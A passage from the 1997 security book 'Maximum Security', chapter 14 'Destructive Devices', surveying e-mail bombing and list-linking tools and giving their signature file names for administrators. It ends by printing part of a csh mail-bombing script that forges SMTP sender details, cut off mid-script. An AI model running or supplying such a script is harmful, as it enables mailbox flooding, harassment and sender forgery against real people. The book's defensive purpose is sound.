ch14.htm

来自「Maximum Security (First Edition) 网络安全 英文」· HTM 代码 · 共 1,271 行 · 第 1/5 页

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>

<HEAD>
	
	<TITLE>Maximum Security -- Ch 14 -- Destructive Devices</TITLE>
</HEAD>

<BODY TEXT="#000000" BGCOLOR="#FFFFFF">

<CENTER>
<H1><IMG SRC="../button/samsnet.gif" WIDTH="171" HEIGHT="66" ALIGN="BOTTOM" BORDER="0"><BR>
<FONT COLOR="#000077">Maximum Security: </FONT></H1>
</CENTER>
<CENTER>
<H2><FONT COLOR="#000077">A Hacker's Guide to Protecting Your Internet Site and Network</FONT></H2>
</CENTER>
<CENTER>
<P><A HREF="../ch13/ch13.htm"><IMG SRC="../button/previous.gif" WIDTH="128" HEIGHT="28"
ALIGN="BOTTOM" ALT="Previous chapter" BORDER="0"></A><A HREF="../ch15/ch15.htm"><IMG
SRC="../button/next.gif" WIDTH="128" HEIGHT="28" ALIGN="BOTTOM" ALT="Next chapter"
BORDER="0"></A><A HREF="../index.htm"><IMG SRC="../button/contents.gif" WIDTH="128"
HEIGHT="28" ALIGN="BOTTOM" ALT="Contents" BORDER="0"></A> 
<HR>

</CENTER>
<CENTER>
<H1><FONT COLOR="#000077">14</FONT></H1>
</CENTER>
<CENTER>
<H1><FONT COLOR="#000077">Destructive Devices</FONT></H1>
</CENTER>
<P>In this chapter, I examine munitions that I classify as <I>destructive devices</I>.
Destructive devices are software programs or techniques that accomplish either of
the following objectives:

<UL>
	<LI>Harassment<BR>
	<BR>
	
	<LI>Destruction of data
</UL>

<P>These devices are all relatively low-level tools and techniques, more likely to
be employed by immature users, disgruntled employees, or kids. Such tools and techniques
exist, to the chagrin of the serious computing communities, but they exist nonetheless.
It is important that new system administrators (and indeed, average users) know about
such destructive devices, so I have included them here even though they are not front-line
security issues for most networks.</P>
<P>The use of these devices is becoming widespread. With the rise of the GUI (and
the increased availability of programming tools and languages to the general populace),
this trend can only be expected to continue.


<BLOCKQUOTE>
	<P>
<HR>
<FONT COLOR="#000077"><B>NOTE:</B></FONT><B> </B>The average high school student
	now has access to C, C++, Pascal, BASIC, and so on. School policies are usually very
	strict about students copying such software, but most youngsters pay little attention.
	I have a client in Los Angeles whose son has built an enormous collection of programming
	tools. He obtained all those programs at his high school. (Young college students
	get these software products legally, perhaps, but at the greatly reduced rate for
	educational institutions. Therefore, they have ready access, irrespective of how
	they acquire such tools.) 
<HR>


</BLOCKQUOTE>

<P>It should be noted that destructive devices can be a security risk for small networks
or single servers. If your box is hooked up via Ethernet with a fast connection and
you have only one mail server, an e-mail bomb attack on one of your users could temporarily
grind your machine to a halt.</P>
<P>I have chosen to highlight four key utilities within the destructive device class:

<UL>
	<LI>E-mail bombs and list linking<BR>
	<BR>
	
	<LI>Flash bombs and war scripts<BR>
	<BR>
	
	<LI>Denial-of-service tools<BR>
	<BR>
	
	<LI>Viruses
</UL>

<P>Of these items, only the last two (denial-of-service tools and viruses) are of
any real consequence. They have the potential for real damage or, equally dangerous,
serious breach of a server's security. (These are discussed in the last half of this
chapter.) The first two, in contrast, have been briefly dealt with in previous chapters.
Here, I take a more comprehensive look at these innocuous but irritating tidbits.
<H3><FONT COLOR="#000077"><B>The E-mail Bomb</B></FONT></H3>
<P>I cannot say for certain when the first user &quot;e-mail bombed&quot; another.
However, I imagine it wasn't long after e-mail became available. (Old-timers adamantly
dispute this, explaining that they were far too responsible for such primitive activity.
Hmmm.) In any event, in this section you will find the key utilities being distributed
for this purpose.
<H4><FONT COLOR="#000077"><B>Up Yours</B></FONT></H4>
<P>The Up Yours mail-bombing program is probably the most popular bomber out there.
It uses minimal resources, does a superb job, has a simple user interface, and attempts
to obscure the attacker's source address. Features of the program include being able
to specify times of day to start and stop as well as the number of messages with
which it will hammer the target. Figure 14.1 shows the main screen of Up Yours. (The
author clearly has a lively sense of humor.)</P>
<P><A NAME="01"></A><A HREF="01.htm"><B>Figure 14.1.</B></A><B><BR>
</B><I>The Up Yours mail-bombing program.</I></P>
<P>Version 2.0 of this utility was released sometime in March 1997. This bomber runs
only on the Microsoft Windows platform. As you might expect, the tech support is
wanting, but the program is free nonetheless. If you are a system administrator,
you will want to scan your local drives for the following files:</P>
<PRE><FONT COLOR="#0066FF">upyours.exe
upyours2.zip
upyours3.zip
</FONT></PRE>
<P>If these files appear in a user's directory, there is a strong likelihood that
he is about to e-mail bomb someone (of course, perhaps he simply spends his time
collecting hacking and cracking programs). In any event, the utility is hard to find.
If one of your users has acquired this program, he clearly has an interest in hacking
or cracking.
<H4><FONT COLOR="#000077"><B>KaBoom</B></FONT></H4>
<P>KaBoom differs significantly from Up Yours. For one thing, KaBoom has increased
functionality. For example, traveling from the opening screen (see Figure 14.2) to
the main program, you find a utility to list link. Using this function, you can subscribe
your target to hundreds of e-mail lists. (Do you remember the case in Chapter 4,
&quot;Just Who Can be Hacked, Anyway?,&quot; where a senior editor of <I>Time</I>
magazine was list linked to thousands of mailing lists?)</P>
<P><A NAME="02"></A><A HREF="02.htm"><B>Figure 14.2.</B></A><B><BR>
</B><I>KaBoom!</I></P>
<P>


<BLOCKQUOTE>
	<P>
<HR>
<FONT COLOR="#000077"><B>NOTE:</B></FONT><B> </B>List linking is a rather insidious
	activity and a not-so-subtle form of harassment. It works like this: On the Internet
	are mail servers that distribute mail messages collected from various sources. These
	messages invariably concentrate on a special-interest subject (the subject of security,
	for example). These mail servers (sometimes called <I>list servers</I>) collect such
	messages and mail them to members of the list on a daily, weekly, or monthly basis.
	Members can subscribe to such a list in several ways, though most commonly through
	e-mail. When I say that a target has been <I>list-linked</I>, I mean the target has
	been subscribed (without his consent) to one or more mailing lists. This is usually
	done with a tool like KaBoom. Such tools submit registration requests on behalf of
	the victim, forging his e-mail address. 
<HR>


</BLOCKQUOTE>

<P>This utility works quite well, but the interface is poorly programmed. (For example,
the main list window presents the lists as selectable from check boxes. This is shoddy
work. The programmer could have saved time and space by running them through a list
box instead. It takes a lot of work using this utility to link the target to any
significant number of lists; the bombing party is forced to scroll down to obtain
more lists.)</P>
<P>In any event, this utility's signature files are these:</P>
<PRE><FONT COLOR="#0066FF">kaboom!3.zip
kaboom3.exe
</FONT></PRE>
<H4><FONT COLOR="#000077"><B>Avalanche</B></FONT></H4>
<P>The Avalanche e-mail bombing utility works smoothly and is well designed. As you
can see in Figure 14.3, the list groups are displayed in a drop-down combo box, and
their individual lists are displayed in a list box. Three clicks of a mouse and your
target is in hot water.</P>
<P><A NAME="03"></A><A HREF="03.htm"><B>Figure 14.3.</B></A><B><BR>
</B><I>Avalanche.</I></P>
<P>


<BLOCKQUOTE>
	<P>
<HR>
<FONT COLOR="#000077"><B>TIP:</B></FONT><B> </B>The programmer here was a bit absentminded.
	The program was written at least in part in Microsoft Visual Basic 4.0. As such,
	there are a series of DLL files that are required to run the application. These are
	missing from the general distribution of this utility; therefore, serious bombers
	must go out onto the Internet to retrieve those files (one is <TT>OC2.DLL</TT>).
	Because of this, I would estimate that Avalanche is probably used less than its counterparts,
	even though its overall design is superior. Inconvenience discourages most users
	of this particular ilk. 
<HR>


</BLOCKQUOTE>

<P>The signature files for this product are</P>
<PRE><FONT COLOR="#0066FF">alanch10.zip
avalanche20.zip
avalanche.exe
</FONT></PRE>
<H4><FONT COLOR="#000077"><B>Unabomber</B></FONT></H4>
<P>The Unabomber utility is a rudimentary tool, but one must give the author credit
for humor. As you can see in Figure 14.4, Unabomber offers no list-linking capabilities.
It is essentially a flat e-mail bomber and does no more than send messages over and
over. One interesting element is that Unabomber comes with a help function. (As though
you would actually need it.)</P>
<P><A NAME="04"></A><A HREF="04.htm"><B>Figure 14.4.</B></A><B><BR>
</B><I>The Unabomber.</I></P>
<P>The signature files for this utility are</P>
<PRE><FONT COLOR="#0066FF">unabomb.zip
unabomb.exe
</FONT></PRE>
<H4><FONT COLOR="#000077"><B>eXtreme Mail</B></FONT></H4>
<P>eXtreme Mail is well programmed. It has all the basic features of a commercial
application, including an interactive installation process. The installation process
performs all the routine checks for disk space, resources, and so forth. It also
observes proper registry conventions and is easily uninstalled. This is a relatively
new mail bomber, and apparently, the name eXtreme is also the name of the group that
produced the software. Figure 14.5 shows eXtreme Mail's main page.</P>
<P><A NAME="05"></A><A HREF="05.htm"><B>Figure 14.5.</B></A><B><BR>
</B><I>eXtreme Mail.</I></P>
<P>The signature files for this product are</P>
<PRE><FONT COLOR="#0066FF">xmailb1.zip
xmailb1.exe
</FONT></PRE>
<H4><FONT COLOR="#000077"><B>Homicide</B></FONT></H4>
<P>The Homicide utility was written by a youngster with the moniker <I>Frys</I> and
was discontinued in 1996. The author claims that he wrote the utility because Up
Yours 2.0 was inadequate as an e-mail bombing tool. However, with the release of
Up Yours 3.0, Frys apparently decided to discontinue any further releases. As of
March 1997, it is available only at a very few select sites. The signature files
for this utility are</P>
<PRE><FONT COLOR="#0066FF">homicide.zip
homicide.exe
</FONT></PRE>
<H3><FONT COLOR="#000077"><B>The UNIX MailBomb</B></FONT></H3>
<P>This UNIX e-mail bomber is reportedly written by CyberGoat, an anonymous cracker
out in the void. The programming is so-so. In fact, the author made no provisions
in the event that the originating server has restrictions on multiple processes.
(Perhaps a <TT>sleep</TT> call would have been wise.) The signature file on this
one is <TT>mailbomb.csh</TT>.</P>
<PRE><FONT COLOR="#0066FF">#!/bin/csh
# Anonymous Mailbomber
# do chmod u+rwx &lt;filename&gt; where filename is the name of the file that
# you saved it as.
#*** WARNING - THIS WILL CREATE AND DELETE A TEMP FILE CALLED
# &quot;teltemp&quot;
# IN THE DIRECTORY IT IS RUN FROM ****
clear
echo -n &quot;What is the name or address of the smtp server ?&quot;
set server = $&lt;
#echo open $server 25 &gt; teltemp
echo quote helo somewhere.com &gt;&gt; teltemp
#The entry for the following should be a single name (goober),
#not goober@internet.address.
echo -n &quot;Who will this be from (e.g. somebody) ?&quot;
set from = $&lt;
echo quote mail from: $from &gt;&gt; teltemp
echo -n &quot;Who is the lucky recipient (e.g. someone@somewhere) ? &quot;
set name = $&lt;
echo quote rcpt to: $name &gt;&gt; teltemp